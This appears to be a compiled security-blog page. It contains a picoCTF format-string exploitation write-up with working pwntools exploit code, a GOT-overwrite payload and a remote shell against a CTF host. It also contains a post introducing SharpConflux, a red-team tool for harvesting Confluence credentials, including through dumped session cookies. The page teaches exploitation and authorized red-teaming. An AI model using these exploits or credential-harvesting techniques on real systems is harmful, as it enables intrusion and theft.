Format String Exploitation: A Hands-On Exploration for Linux

23 May 2024 at 11:00
Summary

This blog post covers a Capture The Flag challenge that was part of the 2024 picoCTF event, which ran until Tuesday 26/03/2024. With a team from NVISO, we decided to participate and tackle as many challenges as we could, resulting in a rewarding 130th place on the global scoreboard. I decided to focus on the binary exploitation challenges. Although I had followed Corelan’s Stack & Heap exploitation on Windows courses, Linux binary exploitation was fairly new to me, providing a nice challenge while trying to fill that knowledge gap.

The challenge covers a format string vulnerability. This is a type of vulnerability where user-supplied input is used as the format string of a function such as printf(), so that any format specifiers it contains are interpreted by the application, resulting in the ability to read from and/or write to memory. The format string 3 challenge provides 4 files.

These files are provided to analyze the vulnerability locally, but the goal is to craft an exploit to attack a remote target that runs the vulnerable binary.

The steps of the final exploit:

  1. Fetch the address of the setvbuf function in libc. This is actually provided by the vulnerable binary itself via a printf() call that simulates an information leak printed to stdout,
  2. Dynamically calculate the base address of the libc library,
  3. Overwrite the puts function address in the Global Offset Table (GOT) with the system function address using a format string vulnerability.

For step 2, it’s important to calculate the address dynamically (vs statically/hardcoded), since the remote target loads libc at a different address every time it runs. We can verify this by running the binary multiple times, which prints a different setvbuf address on each run. This is due to Address Space Layout Randomization (ASLR). Whether the main binary is randomized as well depends on the Position Independent Executable (PIE) compiler flag, which can be checked by using readelf on our binary since the binary is provided as part of the challenge.

Interesting resource to learn more about the difference between these mitigations: ASLR/PIE – Nightmare (guyinatuxedo.github.io)

Then, by spawning a shell, we can read and submit the flag file content to solve the challenge.

Vulnerability Details

Background on string formatting

The challenge involved a format string vulnerability, as suggested by its name and description. This vulnerability arises when user input is passed directly as the format argument to functions such as the C library’s printf() and its variants:

int printf(const char *format, ...)
int fprintf(FILE *stream, const char *format, ...)
int sprintf(char *str, const char *format, ...)
int vprintf(const char *format, va_list arg)
int vsprintf(char *str, const char *format, va_list arg)

Even with input validation in place, passing input directly to one of these functions (think: printf(input)) should be avoided. It’s recommended to use placeholders and string formatting such as printf("%s", input) instead.

The impact of a format string vulnerability can be divided in a few categories:

  • Ability to read values on the stack
  • Arbitrary memory reads
  • Arbitrary memory writes

In the case where arbitrary memory writes are possible, an adversary may obtain full control over the execution flow of the program and potentially even remote code execution.

Background on Global Offset Table

Both the Procedure Linkage Table (PLT) & Global Offset Table (GOT) play a crucial role in the execution of programs, especially those compiled using shared libraries – almost any binary running on a modern system.

The GOT serves as a central repository for storing addresses of global variables and functions. In the current context of a CTF challenge featuring a format string vulnerability, understanding the GOT is crucial. Exploiting this vulnerability involves manipulating the addresses stored in the GOT to redirect program flow.

When an executable is programmed in C to call function and is compiled as an ELF executable, the function will be compiled as function@plt. When the program is executed, it will jump to the PLT entry of function and:

  • If there is a GOT entry for function, it jumps to the address stored there;
  • If there is no GOT entry, it will resolve the address and jump there.

An example of the first option, where there is a GOT entry for function, is depicted in the visual below:

During the exploitation process, our goal is to overwrite entries in the GOT with addresses of our choosing. By doing so, we can redirect the program’s execution to arbitrary locations, such as shellcode or other parts of memory under our control.
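To make the indirection concrete, here is a minimal toy model in Python. It is only an analogy: real PLT stubs are machine code and GOT entries are raw addresses, and every name below (`got`, `puts_plt`, `libc_puts`, `libc_system`) is made up for illustration.

```python
# Toy model only: real PLT stubs and GOT entries are machine code and raw
# addresses, not Python objects. All names here are illustrative.

def libc_puts(arg):
    return f"puts prints: {arg}"

def libc_system(arg):
    return f"system runs: {arg}"

# The GOT maps an imported symbol to the address it currently resolves to.
got = {"puts": libc_puts}

def puts_plt(arg):
    """Stand-in for puts@plt: jump to whatever the GOT entry holds."""
    return got["puts"](arg)

before = puts_plt("/bin/sh")

# An arbitrary write that lands on the GOT entry changes the call target,
# while the calling code itself stays untouched.
got["puts"] = libc_system
after = puts_plt("/bin/sh")

print(before)
print(after)
```

The caller never changes: only the table entry does, which is why a single well-placed write is enough to redirect every later call to that function.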

Reviewing the source code

We are provided with the following source code:

#include <stdio.h>

#define MAX_STRINGS 32

char *normal_string = "/bin/sh";

void setup() {
	setvbuf(stdin, NULL, _IONBF, 0);
	setvbuf(stdout, NULL, _IONBF, 0);
	setvbuf(stderr, NULL, _IONBF, 0);
}

void hello() {
	puts("Howdy gamers!");
	printf("Okay I'll be nice. Here's the address of setvbuf in libc: %p\n", &setvbuf);
}

int main() {
	char *all_strings[MAX_STRINGS] = {NULL};
	char buf[1024] = {'\0'};

	setup();
	hello();	

	fgets(buf, 1024, stdin);	
	printf(buf);

	puts(normal_string);

	return 0;
}

Since we have a compiled version provided from the challenge, we can proceed and make it executable. We then do a test run, which provides the following output:

# Making both the executable & linker executable
chmod u+x format-string-3 ld-linux-x86-64.so.2

# Executing the binary
./format-string-3

Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7f7c778eb3f0

# This is our input, ending with <enter>
test

test
/bin/sh

We note a couple of things:

  • The binary provides us with the memory address of the setvbuf function in the libc library,
  • We have a way of providing a string as input which is read by the fgets function and printed back in an unsafe manner using printf,
  • The program finishes with a puts() function call that writes /bin/sh to stdout.

This is hinting towards a memory address overwrite of the puts() function to replace it with the system() function address. As a result, it will then execute system("/bin/sh") and spawn a shell.

Vulnerability #1: Memory Leak

If we take another look at the source code above, we notice the following line in the hello() function:

printf("Okay I'll be nice. Here's the address of setvbuf in libc: %p\n", &setvbuf);

Here, the creators of the challenge intentionally leak a memory address to make the challenge easier. If not, we would have to deal with finding an information leak ourselves to bypass Address Space Layout Randomization (ASLR), if enabled.

We can still treat this as an actual information leak that provides us a memory address during runtime. We will use this information to dynamically calculate the base address of the libc library based on the setvbuf function address in the exploitation section below.

Vulnerability #2: Format String Vulnerability

In the test run above we provided a simple test string as input to the program, which was printed back to stdout via the printf(buf) function call. In an excellent paper that can be found here, we learned that we can use format specifiers in C to:

  • Read arbitrary stack values, using format specifiers such as %x (hexadecimal) or %p (pointers),
  • Read from arbitrary memory addresses using a combination of %c to move the argument pointer and %s to print the contents of memory starting from an address we specify in our input string,
  • Write to arbitrary memory addresses by controlling the output counter using %mc, which will increase the output counter with m. Then, we can write the output counter value to memory using %n, again if we provide the memory address correctly as part of our input string.

Even though the source code already indicates that our input is unsafely processed and parsed as an argument for the printf() function, we can verify that we have a format string vulnerability here by providing %p as input, which should read a value as a pointer and print it back to us:

# Executing the binary
./format-string-3

Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7f2818f423f0

# This is our input, ending with <enter>
%p

# This is the output of the printf(buf) function call
# This now prints back a value as a pointer
0x7f28190a0963
/bin/sh

The challenge preceding format string 3, called format string 2, actually provided very good practice to get to know format string specifiers and how you can abuse them to read from memory and write to memory. Highly recommended!

Exploitation

We are now armed with an information leak that provides us a memory address and a format string vulnerability. Let’s try and combine these two to get code execution on our remote system.

Calculating input string offset

Before we can really start, there is something we need to address: how do we know where our input string is located in memory once we have sent it to the program? And why does this even matter?

Let’s first have a look at the input AAAAAAAA%2$p. This provides 8 A characters, and then a format specifier to read the 2nd argument to the printf() function, which will, in this case, be a value from memory:

Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7fa5ae99b3f0
AAAAAAAA%2$p
AAAAAAAA0xfbad208b
/bin/sh

Ideally (we’re explaining why later), we have a format specifier %n$p where n is an offset to point exactly at the start of our input string. You can do this manually (%p, %2$p, %3$p…) until %p points to your input string, but I did this using gdb:

# Open the program in gdb
gdb format-string-3

# Put a breakpoint at the puts function
b puts

# Run the program
r

# Continue the program since it will hit the breakpoint 
# on the first puts call in our program (Howdy Gamers !)
c

# Provide our input AAAAAAAA followed by <enter>
AAAAAAAA

The program should now hit the breakpoint on puts() again, after which we can look at the stack using context_stack 50 to print 50×8 bytes on the stack. You should be able to identify your input string on the 33rd line, which we can easily calculate by dividing the number of bytes by 8:

Calculating offset based on stack line position.

You could assume that 33 is the offset we need, but there’s a catch:

From https://lettieri.iet.unipi.it/hacking/format-strings.pdf:

On 64b systems, the first 5 %lx will print the contents of the rsi, rdx, rcx, r8, and r9, and any additional %lx will start printing successive 8-byte values on the stack.

This means we need to add 5 to our offset to compensate for the 5 registers, resulting in a final offset of 38, as can be seen in the following visual:

[Figure: Offset calculation arbitrary read. Created using Excalidraw.]

The offset displayed on top of the visual indicates the relative offset from the start of the stack.

This offset now points exactly to the start of our input string:

Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7ff5ed4873f0
AAAAAAAA%38$p
AAAAAAAA0x4141414141414141
/bin/sh

AAAAAAAA is converted to 0x4141414141414141 in hexadecimal since we are printing the input string as a pointer using %p.
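The manual search mentioned earlier (%p, %2$p, %3$p…) can also be scripted. The sketch below is one possible way to do it, not the approach used in this post: `probe` is a hypothetical callable that sends one input line and returns the program's echo, and `fake_target` is a stand-in that simply hard-codes the values observed above so the example runs on its own.

```python
import struct

MARKER = b"AAAAAAAA"

def find_format_offset(probe, max_index=64):
    """Return the first positional index whose %p output equals the marker.

    `probe` is a hypothetical callable: it takes the input line as bytes and
    returns what the target printed in response to it.
    """
    wanted = hex(struct.unpack("<Q", MARKER)[0]).encode()  # b"0x4141414141414141"
    for index in range(1, max_index + 1):
        line = MARKER + b"%" + str(index).encode() + b"$p"
        if probe(line).endswith(wanted):
            return index
    return None

def fake_target(line):
    """Stand-in for the real binary, hard-wired to the values seen above."""
    index = int(line[len(MARKER) + 1:-2])
    value = 0x4141414141414141 if index == 38 else 0xfbad208b
    return MARKER + hex(value).encode()

print(find_format_offset(fake_target))
```

Against the real binary, `probe` would need to start a fresh process for every attempt and strip the trailing newline, since the program reads a single line and then exits.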

Now the (probably) more critical question: why does it matter that we know how to point to our input string in memory? Up until this point, we have only been reading our own string in memory. What will happen when we replace the %p format specifier, which reads, with the %n format specifier, which writes?

Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7f4bfd3ff3f0
AAAAAAAA%38$n
zsh: segmentation fault  ./format-string-3

We get a segmentation fault. What is going on? Our input string now tries to write the value of the output counter to the memory address we were pointing to before with %p, which is… our input string itself.

This means we now have control over where we can write values since we control the input string. We can also modify what we are writing to memory as long as we can control the output counter. We also have control over this, as explained before:

Write to arbitrary memory addresses by controlling the output counter using %mc, which will increase the output counter with m.

By changing the format specifier, we now executed the following:

[Figure: Offset calculation arbitrary write. Created using Excalidraw.]

To clearly grasp the concept: if we change our input string to BBBBBBBB, we will now write to 0x4242424242424242 instead, indicating we can control to which memory address we are writing something by modifying our input string.

In this case, we received a segmentation fault since the memory at 0x4141414141414141 is not writeable (page protections, not mapped…). In the next part, we’re going to convert our arbitrary write primitive to effectively do something useful by overwriting an entry in the Global Offset Table.
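The mapping between the 8 bytes we type and the address that %p or %n ends up using is plain little-endian encoding. A small sketch using only Python's standard library (the helper names are made up, and 0x404018 is just an example of a low, writable-looking address):

```python
import struct

def as_pointer(eight_bytes):
    """Interpret 8 input bytes the way %p or %n sees them (little-endian)."""
    return struct.unpack("<Q", eight_bytes)[0]

def as_input(address):
    """Encode a 64-bit address as the 8 bytes to place in the input string."""
    return struct.pack("<Q", address)

print(hex(as_pointer(b"AAAAAAAA")))
print(hex(as_pointer(b"BBBBBBBB")))
print(as_input(0x404018))
```

Note that a realistic address contains null bytes once encoded. fgets reads them without complaint, but printf stops parsing the format string at the first null byte, so addresses have to come after the format specifiers rather than before them.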

Local Exploitation

Let’s take a step back and think what we logically need to do. We need to:

  1. Fetch the address of our setvbuf function in the libc library, provided by the program,
  2. From this address, calculate the base address of libc,
  3. Send a format string payload that overwrites the puts function address in the GOT with the system function address in libc,
  4. Continue execution to give control to the operator.

We are going to use the popular pwntools library for Python 3 to help us out quite a bit.

First, let’s attach to our program and print the lines until we hit the libc: output string, then store the memory address in an integer:

from pwn import *

p = process("./format-string-3")

info(p.recvline())              # Fetch Howdy gamers!
info(p.recvuntil(b"libc: "))    # Fetch the text right before the setvbuf address

# Get the setvbuf address
bytes_setvbuf_address = p.recvline()

# Convert the output bytes to an integer to store and work with our address
setvbuf_leak = int(bytes_setvbuf_address.split(b"x")[1].strip(), 16)
info("Received setvbuf address leak: %s", hex(setvbuf_leak))

### Sample Output
[+] Starting local process './format-string-3': pid 216507
[*] Howdy gamers!
[*] Okay I'll be nice. Here's the address of setvbuf in libc: 
[*] Received setvbuf address leak: 0x7fb19acc83f0
[*] Stopped process './format-string-3' (pid 216507)

Second, we manually load libc so that we can set its base address to match the libc base address of our (now local, but future remote) target. We calculate it by subtracting the offset of setvbuf inside our manually loaded libc file from the leaked setvbuf address:

...
libc = ELF("./libc.so.6")
info("Calculating libc base address...")
libc.address = setvbuf_leak - libc.symbols['setvbuf']
info("libc base address: %s", hex(libc.address))

### Sample Output
[+] Starting local process './format-string-3': pid 219013
[*] Howdy gamers!
[*] Okay I'll be nice. Here's the address of setvbuf in libc: 
[*] Received setvbuf address leak: 0x7f25a21de3f0
[*] Calculating libc base address...
[*] libc base address: 0x7f25a2164000
[*] Stopped process './format-string-3' (pid 219013)
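The same arithmetic can be checked without pwntools. The sketch below derives the setvbuf offset from the sample output above (leak minus printed base) and applies it to the leak from the earlier run. The helper names are made up, and the page-alignment check is an extra sanity test rather than something the exploit needs.

```python
def parse_leak(line):
    """Extract the pointer from a line such as b'0x7f25a21de3f0\n'."""
    return int(line.strip(), 16)

def libc_base(leak, symbol_offset):
    """Base address = runtime address of a symbol minus its offset in the file."""
    base = leak - symbol_offset
    # Shared objects are mapped on page boundaries; a misaligned result
    # usually means the wrong libc file or the wrong symbol was used.
    if base % 0x1000:
        raise ValueError("libc base is not page-aligned")
    return base

# Offset implied by the sample run above: leak minus printed base.
SETVBUF_OFFSET = 0x7f25a21de3f0 - 0x7f25a2164000

leak = parse_leak(b"0x7fb19acc83f0\n")
print(hex(SETVBUF_OFFSET), hex(libc_base(leak, SETVBUF_OFFSET)))
```

Because only the base changes between runs, the low 12 bits of every leak (0x3f0 here) stay constant, which is a quick way to confirm that a leaked value really is the symbol you expect.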

Finally, we can utilize the fmtstr_payload function of pwntools to easily write:

  • What: the system function address in libc
  • Where: the puts entry in the GOT of our binary

Before actually executing and sending our payload, let’s make sure we understand what’s happening. We start by noting down the addresses of:

  • the system function address in libc (0x7f852ddca760)
  • the puts entry in the GOT of our binary (0x404018)

next to the payload we are going to send in an interactive Python prompt, for demonstration purposes:

>>> elf = context.binary = ELF('./format-string-3')
>>> hex(libc.symbols['system'])
'0x7f852ddca760'
>>> hex(elf.got['puts'])
'0x404018'
>>> fmtstr_payload(38, {elf.got['puts'] : libc.symbols['system']})
b'%96c%47$lln%31c%48$hhn%6c%49$hhn%34c%50$hhn%53c%51$hhn%81c%52$hhnaaaabaa\x18@@\x00\x00\x00\x00\x00\x1d@@\x00\x00\x00\x00\x00\x1c@@\x00\x00\x00\x00\x00\x19@@\x00\x00\x00\x00\x00\x1a@@\x00\x00\x00\x00\x00\x1b@@\x00\x00\x00\x00\x00'

You can divide the payload in different blocks, each serving the purpose we expected, although it’s quite a step up from what we’ve manually done before. We can identify the pattern %mc%n$hhn (or ending lln), which:

  • Increases the output counter with m (note that the output counter does not necessarily start at 0)
  • Writes the value of the output counter to the address selected by %n$hhn. The first n selects the relevant entry on the stack where our input string memory address is located. The second part, $hhn, resembles our expected %n format specifier, but the double hh is a modifier to truncate the output counter value to the size of a char, thus allowing us to write 1 byte.

[Figure: Offset calculation precision write. Created using Excalidraw.]

Let’s now analyze the payload and work through 1 write operation ourselves to understand how the payload works. We have %96c%47$lln as the first block of our payload, which can be logically seen as a write operation. This:

  • Increases the output counter by 96 (decimal), or 0x60 in hexadecimal, which is the lowest byte of the system address 0x7f852ddca760
  • Writes the current value of the output counter (%n) as a long long (ll), or 8 bytes, to the memory address found at offset 47.

Offset 47 follows from the payload layout: the format specifiers and padding in front of the addresses take up 72 bytes, or 9 stack slots of 8 bytes, and our input starts at offset 38, so the first address sits at offset 38 + 9 = 47. As you can see in the payload above, offset 47 corresponds with \x18@@\x00\x00\x00\x00\x00, which is further down our payload. @ is \x40 in hex, so our target address matches the value for the puts entry in the GOT if we swap the endianness: \x00\x00\x00\x00\x00\x40\x40\x18, or 0x404018. This clearly indicates we are writing to the correct memory location, as expected.

You’ll notice that aaaabaa is also part of our payload: this serves as padding to correctly align our payload to have 8-byte addresses on the stack. The start of an offset on the stack should contain exactly the start of our 8-byte memory address to write to, since we’re working on a 64-bit system. If no padding is present, a reference to an offset would start in the middle of a memory address.

After writing, the payload continues with the next block, %31c%48$hhn, which again increases the output counter and writes a single byte to the address at the next offset (48). This offset contains our next address. The payload continues until all 6 blocks are executed, which corresponds to 6 %…%n statements.
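To double-check this reading of the payload, the six blocks can be replayed in a few lines of Python. This is a simplified simulation, not how printf is implemented: it assumes the output counter starts at 0, treats memory as a dictionary, and only understands the %Nc and %K$lln / %K$hhn patterns that appear in this payload.

```python
import re
import struct

PAYLOAD = (
    b"%96c%47$lln%31c%48$hhn%6c%49$hhn%34c%50$hhn%53c%51$hhn%81c%52$hhnaaaabaa"
    b"\x18@@\x00\x00\x00\x00\x00\x1d@@\x00\x00\x00\x00\x00"
    b"\x1c@@\x00\x00\x00\x00\x00\x19@@\x00\x00\x00\x00\x00"
    b"\x1a@@\x00\x00\x00\x00\x00\x1b@@\x00\x00\x00\x00\x00"
)
INPUT_OFFSET = 38  # positional index of the first 8 bytes of our input

def simulate(payload):
    """Replay the %Nc / %K$..n blocks against a dict standing in for memory."""
    # 8-byte stack slots, as printf would index them from INPUT_OFFSET on.
    slots = [payload[i:i + 8] for i in range(0, len(payload), 8)]
    memory, counter = {}, 0
    for pad, index, size in re.findall(rb"%(\d+)c%(\d+)\$(lln|hhn)", payload):
        counter += int(pad)  # %Nc prints N characters
        target = struct.unpack("<Q", slots[int(index) - INPUT_OFFSET])[0]
        width = 8 if size == b"lln" else 1  # long long vs. char
        data = (counter % (1 << (8 * width))).to_bytes(width, "little")
        for i, byte in enumerate(data):
            memory[target + i] = byte
    return memory

memory = simulate(PAYLOAD)
got_puts = bytes(memory[0x404018 + i] for i in range(8))
print(hex(int.from_bytes(got_puts, "little")))
```

The first write (lln) sets the lowest byte to 0x60 and zeroes the other seven, after which the five single-byte writes fill in the remaining bytes of the system address. They are ordered by increasing byte value (0x7f, 0x85, 0xa7, 0xdc, then 0x12d truncated to 0x2d) because the output counter can only grow.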

Now that we understand the payload, we load the binary using ELF and send our payload to our target process, after which we give interactive control to the operator:

...
elf = context.binary = ELF('./format-string-3')
info("Creating format string payload...")
payload = fmtstr_payload(38, {elf.got['puts'] : libc.symbols['system']})

# Ready to send payload!
info("Sending payload...")
p.sendline(payload)
p.clean()

# Give control to the shell to the operator
info("Payload successfully sent, enjoy the shell!")
p.interactive()

The fmtstr_payload function really does a lot of heavy lifting for us, combined with the elf and libc references. It effectively writes the complete address of libc.symbols['system'] to the location where elf.got['puts'] originally was in memory by precisely modifying the output counter and executing memory write operations.

### Sample Output
[+] Starting local process './format-string-3': pid 227263
[*] Howdy gamers!
[*] Okay I'll be nice. Here's the address of setvbuf in libc: 
[*] Received setvbuf address leak: 0x7fa7c29473f0
[*] '/home/kali/picoctf/libc.so.6'
[*] Calculating libc base address...
[*] libc base address: 0x7fa7c28cd000
[*] '/home/kali/picoctf/format-string-3'
[*] Creating format string payload...
[*] Sending payload...
[*] Payload successfully sent, enjoy the shell!
[*] Switching to interactive mode
$ whoami
kali

We successfully exploited the format string vulnerability and called system('/bin/sh'), resulting in an interactive shell!

Remote Exploitation

Switching to remote exploitation is trivial in this challenge, since we can simply reuse the local files to do our calculations. Instead of attaching to a local process using p = process("./format-string-3"), we substitute this by connecting to a remote target:

# Define remote targets
target_host = "rhea.picoctf.net"
target_port = 62200

# Connect to remote process
p = remote(target_host, target_port)

Note that you’ll need to substitute the port that is provided to you after launching the instance on the picoCTF platform.

### Sample Output
...
[*] Payload successfully sent, enjoy the shell!
[*] Switching to interactive mode
$ ls flag.txt
flag.txt

That concludes the exploit, after which we can submit our flag. In a real world scenario, getting this kind of remote code execution would clearly be a great risk.

Conclusion

The preceding challenges that lead up to this challenge (format string 0, 1, 2) proved to be a great help in understanding format string vulnerabilities and how to exploit them. Since Linux exploitation is a new topic to me, this was a great way to practice these types of vulnerabilities during a fun event.

Format string vulnerabilities are less common than they used to be. However, our IoT colleagues assured me they encountered some recently during an IoT device assessment.

That’s why it’s important to adhere to:

  • Input Validation
  • Limit User-Controlled Input
  • Enable (or pay attention to already enabled) compiler warnings for format string vulnerabilities
  • Secure Coding Practices

This should greatly limit the risk of format string vulnerabilities still being present in current day applications.

About the author

Wiebe Willems

Wiebe Willems is a Cyber Security Researcher active in the Research & Development team at NVISO. With his extensive background in Red & Purple Teaming, he is now driving the innovation efforts of NVISO’s Red Team forward to deliver even better advisory to its clients.

Wiebe honed his skills by getting certifications for well-known Red Teaming trainings, next to taking deeply technical courses about stack & heap exploitation.

Introducing SharpConflux

27 March 2024 at 09:00

Today, we are releasing a new tool called SharpConflux, a .NET application built to facilitate Confluence exploration. It allows Red Team operators to easily investigate Confluence instances with the goal of finding credential material and documentation relating to objectives without having to rely on SOCKS proxying.

SharpConflux is available for download from the GitHub repository below:

GitHub: https://github.com/nettitude/SharpConflux/

Background

Red Team operators typically interact with the target organisation’s network via an in-memory implant supported by a Command and Control (C2) framework such as Fortra’s Cobalt Strike, MDSec’s Nighthawk or Nettitude’s PoshC2. Direct access to the corporate network through a Virtual Private Network (VPN) or graphical access to a Virtual Desktop Infrastructure (VDI) host is unusual, meaning that in order to interact with internal corporate websites, operators must tunnel traffic from their systems to the internal network, through the in-memory implant.

Multiple tools exist for this purpose, such as SharpSocks and Cobalt Strike’s built-in socks command. However, this approach presents two problems:

  • First of all, it is troublesome to set up. While a seasoned operator will be able to do so in minutes, I have yet to meet a Red Teamer who enjoys the setup process and the laggy browsing experience. In fact, this tool was created as a result of a recent Red Team exercise during which none of the operators wanted to set up proxying to explore an internal Confluence instance.
  • Secondly, in order to provide a stable and usable experience, it forces operators to set the implant’s beaconing time to a small value (almost always less than 100 milliseconds, and often 0 milliseconds). This significantly increases the number of HTTP requests transmitted over the existing C2 channel, creating abnormal volumes of traffic and therefore, providing detection opportunities. Additionally, this prevents certain in-memory evasion techniques from functioning as expected (e.g. Cobalt Strike’s sleep masks), thus potentially leading to a detection by the Endpoint Detection & Response (EDR) solution in place.

SharpConflux aims to bring Confluence exploration functionality to .NET, in a way that can be reliably and flexibly used through common C2 frameworks.

Confluence Introduction

Confluence is a data sharing platform developed by Atlassian, generally used by organisations as a corporate wiki.

Content is organised in spaces, which are intended to facilitate information sharing between teams (e.g. the IT department) or employees responsible for specific projects. Furthermore, users can set up their own personal spaces, to which they can upload public or private data.

Within these spaces, users can publish and edit web pages and blog posts through a web-based editor, and attach any relevant files to them. Additionally, users can add comments to pages and blog posts.

The diagram below, which has been extracted from Confluence’s support page, better illustrates the structure used by the platform:

The hierarchy of content in Confluence

From a Red Teamer’s perspective, Confluence is particularly useful in two scenarios:

  • During early stages of the operation, as all sorts of credentials can typically be found in Confluence. These may facilitate privilege escalation and lateral movement activities.
  • To discover documentation, hostnames and even credential material relating to the objective systems, which are usually targeted after achieving high levels of privileges and therefore, in late stages of the cyber kill chain.

Confluence Instance Types and Authentication

Atlassian offers three Confluence hosting options to fit different organisations’ requirements:

  • Confluence Cloud instances are maintained by Atlassian and hosted on their own AWS tenants. This is the preferred option for newer Atlassian clients. Confluence Cloud instances are accessed as a subdomain of atlassian.net. For instance, https://companysubdomain.atlassian.net/wiki/.
  • Confluence Server and Confluence Data Center instances are maintained by the relevant organisation and therefore, they are hosted on their servers. This can be completely on-premise, or in any cloud tenant managed by the organisation (e.g. Azure, AWS, GCP). Both instance types are similar but Data Center includes additional features. It should be noted that Atlassian has decided to discontinue Confluence Server and support ended in February 2024. However, it still has plans to support Confluence Data Center for the foreseeable future. These instance types run on TCP port 8090 by default and can typically be accessed through an internal FQDN (e.g. http://myconfluence.internal.local:8090). For the purpose of this tool, Confluence Server and Confluence Data Center are considered equivalent.

Even though a lot of organisations are migrating to Confluence Cloud, a significant proportion of them still use on-premise Confluence instances. In fact, it is not uncommon to find companies that have already made the move to Cloud but still maintain on-premise instances for specific internal projects, platforms or departments.

Certain attributes and API endpoints differ slightly between Cloud and Server / Data Center instances. More importantly, authentication methods are significantly different. SharpConflux has been developed with compatibility in mind, supporting a variety of authentication methods across the different instance types.

The most relevant authentication methods are described below.

Confluence Cloud: Email address + password authentication

Users can authenticate to Confluence Cloud instances using an email address and password combination. Upon browsing https://companysubdomain.atlassian.net/wiki/, unauthenticated users are redirected to https://id.atlassian.com/login, where the following form data is posted:

{
   "username":"EMAILVALUE",
   "password":"PASSWORDVALUE",
   "state":
   {
      "csrfToken":"CSRFTOKENVALUE",
      "anonymousId":"ANONYMOUSIDVALUE"
   },
   "token":"TOKENVALUE"
}

If the credentials provided in the username and password parameters, as well as the csrfToken and token parameters, are correct, the server will return a redirect URI. Subsequently accessing this URI will cause the server to set the cloud.session.token session cookie.

This authentication method is not supported by SharpConflux. From an adversarial perspective, firms very rarely rely on this authentication mechanism, as most will be using SAML SSO authentication for Cloud instances.

Confluence Cloud: Email address + API token

Users can create and manage their own API tokens by visiting https://id.atlassian.com/manage-profile/security/api-tokens:

In order to authenticate, the user’s email address and API token are submitted through the Authorization: Basic header in each HTTP request.

This authentication method is supported by SharpConflux. However, gathering valid API tokens is a rare occurrence.
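As a rough illustration of what such a request header looks like, HTTP Basic authentication sends the Base64 encoding of `user:secret` in the Authorization header. The sketch below uses Python rather than SharpConflux's own .NET code, and the helper name and credential values are placeholders.

```python
import base64

def basic_auth_header(email, api_token):
    """Build the Authorization header for HTTP Basic authentication."""
    credentials = f"{email}:{api_token}".encode()
    return {"Authorization": "Basic " + base64.b64encode(credentials).decode()}

# Placeholder values, not real credentials.
header = basic_auth_header("user@example.com", "EXAMPLETOKEN")
print(header)
```

Base64 is an encoding, not encryption, so anyone who captures the header can recover the email address and token.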

Confluence Cloud: Third Party and SAML SSO

Confluence Cloud allows users to log in with third party (e.g. Apple, Google, Microsoft, Slack) accounts. Typically, firms will configure Confluence Cloud instances to authenticate through Active Directory Federation Services (ADFS) or Azure AD.

Once the SAML exchange is completed, the server will return a redirect URI to https://id.atlassian.com/login/authorize. Subsequently accessing this URI will cause the server to set the cloud.session.token session cookie.

As of the time of release, this authentication method is not supported by SharpConflux. Whilst this is the most commonly deployed authentication method by organisations relying on Confluence Cloud, it is also frequent for them to enforce Multi-Factor Authentication (MFA), making cookie-based authentication a much more interesting method from an adversarial perspective.

Confluence Cloud: Cookie-based Authentication

If you have managed to dump Confluence Cloud cookies (e.g. via DPAPI), you can use SharpConflux to authenticate to the target instance. Please note that including a single valid cloud.session.token or tenant.session.token cookie should be sufficient to authenticate, but you can specify any number of cookies if you prefer.

Confluence Server / Data Center: Username + password (Basic authentication)

By default, Confluence Server / Data Center installations support username + password authentication through the Authorization: Basic HTTP request header. However, Basic authentication can be disabled by the target organisation through the “Allow basic authentication on API calls” setting:

This authentication method is supported by SharpConflux. From an adversarial perspective, finding a username and password combination for an on-premise Confluence instance is one of the most common scenarios.

Confluence Server / Data Center: Username + password (via form data)

Users can visit the on-premise Confluence website (e.g. http://myconfluence.internal.local:8090) and log in using a valid username and password combination. The following HTTP POST request will be sent as a result:

POST /dologin.action HTTP/1.1
[...]

os_username=USERNAMEVALUE&os_password=PASSWORDVALUE&login=Log+in&os_destination=%2Findex.action

If the provided credentials within the os_username and os_password parameters are correct, the server will set the JSESSIONID session cookie.

This authentication method is supported by SharpConflux. Similarly to the previous method, finding a username and password combination is one of the most common scenarios. Please note that this authentication method will still work even if the “Allow basic authentication on API calls” setting is disabled.
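The request body shown above is ordinary URL-encoded form data. A minimal Python sketch that reproduces it (the function name is made up, and this is not SharpConflux's implementation):

```python
from urllib.parse import urlencode

def login_form_body(username, password):
    """URL-encode the fields posted to /dologin.action."""
    fields = {
        "os_username": username,
        "os_password": password,
        "login": "Log in",
        "os_destination": "/index.action",
    }
    return urlencode(fields)

body = login_form_body("USERNAMEVALUE", "PASSWORDVALUE")
print(body)
```

Encoding matters in practice because passwords often contain characters such as & or =, which would otherwise corrupt the form body.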

Confluence Server / Data Center: Personal Access Token (PAT)

On Confluence Server / Data Center installations, users are allowed to create and manage their own Personal Access Tokens (PATs), which will match their current permission level. PATs can be created from /plugins/personalaccesstokens/usertokens.action:

In order to authenticate, the PAT is submitted through the Authorization: Bearer header in each HTTP request.

While this authentication method is supported by SharpConflux, it has only been added for completeness and to support edge cases, as I have never come across a PAT.

Confluence Server / Data Center: SSO

Similarly to Confluence Cloud instances, Confluence Server / Data Center variations support authentication through various Identity Providers (IdP) including ADFS, Azure AD, Bitium, Okta, OneLogin and PingIdentity. However, in this case, it is uncommon to find on-premise Confluence instances making use of SSO. For this reason, this authentication method is not supported by SharpConflux as of the time of release.

Confluence Server / Data Center: Cookie-based authentication

If you have managed to dump Confluence Server / Data Center cookies (e.g. via DPAPI), you can use SharpConflux to authenticate to the target instance. Please note that including a single valid JSESSIONID or seraph.confluence cookie should be sufficient to authenticate, but you can specify any number of cookies if you prefer.

Summary

Confluence is the most widely used corporate wiki platform, often storing sensitive data that can greatly facilitate privilege escalation and lateral movement activities. Whilst this blog post has not uncovered any new attack techniques, the release of SharpConflux aims to help Red Team operators by providing an easy way to interact with all types of Confluence instances.

SharpConflux has been tested against the latest supported versions as of the time of development (Cloud 8.3.2, Data Center 7.19.10 LTS and Data Center 8.3.2). A complete list of features, usage guidelines and examples can be found in the referenced GitHub project.

GitHub: https://github.com/nettitude/SharpConflux/

 

The post Introducing SharpConflux appeared first on LRQA Nettitude Labs.

OffSec EXP-401 Advanced Windows Exploitation (AWE) – Course Review

By: voidsec
18 January 2024 at 16:19

